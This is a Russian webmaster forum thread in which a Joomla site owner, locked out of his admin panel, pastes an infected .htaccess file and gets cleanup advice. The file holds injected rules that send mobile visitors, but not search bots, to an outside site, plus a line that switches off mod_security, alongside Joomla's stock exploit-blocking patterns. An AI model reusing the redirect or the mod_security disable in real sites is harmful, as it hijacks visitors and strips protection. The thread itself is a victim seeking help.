CY-PR
  

Войти

Войти | Регистрация
Поиск по сайту
Не могу зайти в админку сайта. Вирус?
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Не могу зайти в админку сайта. Вирус?
#1
9 Апреля 2012 12:37
Здравствуйте!  Сайт джумла 1.5 Перестал пускать в админку сайта. После введения правильного (и даже неправильного) пароля идет обновление страницы без какого-либо сообщения. 
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало. 
Плагины авторизации и com_uzers включены (везде стоит 1). Может отключены куки? Но я не знаю где это смотреть (буду благодарен, если подскажите). 

А сегодня зашел в файл .htaccess и увидел там такое (выделенным цветом). 

Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить? :


RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://сайт.ru/ [L,R=302]
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright © 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On


########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
<IfModule mod_security.c> 
# Disable mod_security 
SecFilterEngine Off 
</IfModule>






Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить?
Изменено: Андрюха - 9 Апреля 2012 12:43
#2
9 Апреля 2012 19:41
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
#3
10 Апреля 2012 13:01
Цитата
Yapy пишет:
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
Не-нет )) Я поменял в БД пароль администратора в плагине юзеров. Но там дело не в пароле. Потому-что страница авторизации на правильный и неправильный пароль не реагирует вообще никак. И зарегистрироваться на сайте тоже нельзя. Такое впечатление что отключены плагины авторизации и регистрации. Но я смотрел в БД - они все включены. 
А что Вы думаете насчет того кода в файле  .htaccess. Могло ли это повлиять? 
#4
10 Апреля 2012 13:32
Ну я б на вашем месте

1) дернул дернул бы только базу и папку images.

2) И на локал хосте собрал  бы новый сайт со всеми компонетнеами и модулями, что у вас сейчас стоят на сайте,  и импотнул бы старую базу, предварительно протестив ее антивирем

Ибо по ходу  Ваш сайт  не только ломанули но и понавнедряли всякую бяку + код попортили
#5
21 Мая 2012 14:04
Проверяй все файлы с расширением js.
Сам недавно чистил эту заразу. 
Проще всего все содержимое сайта скопируй в какую нибудь папку к себе на комп и напусти на нее kasperskiy removal tool.
Она эту дрянь видит но не лечит. Далее либо зараженные файлы js восстанавливать из бэкапа (мой случай) либо вручную править зараженные файлы.
Зараза свой код дописывает в конце. Но это муторно -  у меня было заражено штук по 150 на каждом сайте.
#6
22 Мая 2012 06:59
Гы, у меня такое на ВП было))) Пол дня голову ламал, потом админам (хостинга) тикет написал и спать пошел. С утра все было зашибись)))
 
Страницы: 1
Похожие темы:
  24.02.2015 16:53  Не могу избавиться от "вируса"
  07.05.2013 16:32  Не могу заблокировать чужой IP, почему-то блокируется мой собственный.
  20.04.2013 14:04  Помогите. Не могу удалить Fishing файлы в корневой папке Wordpress
  08.10.2012 14:48  не могу зайти на сайт
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:30 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:33 Партнерская программа OWNR WALLET 
13:24 Bropush - твой бро в монетизации сайта push-уведомлениями 
12:35 TacoLoco - рекламная сеть от LosPollos. Большие объёмы качественного трафика! 
15:08 Adtrafico - Правильная партнёрская сеть под бурж трафик 
21:06 Кто как борется с ботами ПФ? 
16:51 Buymedia.biz - рекламная сеть 
15:42 Expa24.com Обмен Криптовалют. Ввод/Вывод наличные Украина/Северный Кипр/Мир 
06:54 Johnny.Do | Обмен криптовалют с круглосуточной техподдержкой 
14:14 JustProxy.Biz - Резидентные прокси без ограничения по трафику 
11:03 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
23:50 Прием платежей для HIGH RISK | Прием платежей без сайта 
23:50 Услуги рассылки Viber|Whatsapp|IMO. 
23:48 Рассылка сообщений в ЛС DISCORD 
02:44 Точные прогнозы на футбол 
15:43 Заказать телефонный флуд. 
12:05 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
11:40 Кто сделает прогон для адалт сайта? 
09:25 Добро пожаловать в цифровой мир... 
10:31 Видимо, похороны СУПРа уже прошли как-то по-тихому 
08:08 С юмором по жизни! 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (179 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 12.05.2024 (8 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
CY-PR
Интересные темы
—  Забери кусок от 31 000 руб. Акция
—  Бизнес на фоне санкций
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Развитие канала в Яндекс Дзен
—  Как монитизировать сайт о путешествиях? 4,5 К посещаемость


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050